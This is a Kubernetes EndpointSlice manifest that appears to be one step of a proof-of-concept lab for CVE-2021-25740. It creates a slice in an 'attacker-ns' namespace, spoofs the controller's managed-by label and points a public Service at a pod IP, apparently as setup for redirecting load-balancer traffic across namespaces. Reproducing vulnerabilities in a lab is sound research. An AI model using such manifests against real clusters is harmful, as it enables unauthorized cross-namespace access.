CVE-2021-25740/loadbalancer/03b-public-endpoints-initial.yaml
apiVersion: discovery.k8s.io/v1
kind: EndpointSlice
metadata:
  name: public-entry-initial
  namespace: attacker-ns
  labels:
    # This label ties the slice to the Service
    kubernetes.io/service-name: public-entry
    endpointslice.kubernetes.io/managed-by: endpointslice-controller.k8s.io
addressType: IPv4
ports:
  - name: ""
    protocol: TCP
    port: 80
endpoints:
  - addresses:
      - "10.244.0.7"   # <-- REPLACE with public-app pod IP
    conditions:
      ready: true
